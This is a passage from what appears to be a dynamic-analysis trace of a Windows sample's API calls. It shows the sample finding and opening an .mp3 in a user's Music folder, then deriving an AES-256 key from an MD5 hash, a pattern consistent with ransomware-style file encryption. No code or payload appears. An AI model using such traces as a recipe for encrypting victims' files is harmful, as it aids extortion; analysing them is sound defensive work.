wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.584] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.584] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0xe4915d20, ftLastWriteTime.dwHighDateTime=0x1d5c1b9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0x7c2240 [0037.584] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.584] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.584] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.585] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.585] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.585] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.585] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.585] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.585] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.585] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.585] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.585] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.585] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.585] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.586] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.586] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.586] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.586] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.587] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.587] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.587] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.587] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.587] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.587] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.587] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.588] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.588] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.588] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.588] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.588] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.589] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.589] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.589] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.589] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.589] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.589] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.589] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.589] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\65ojnsjozhlti0vkh7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.590] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.591] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.593] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni")) returned 0x10 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.593] CreateFileW 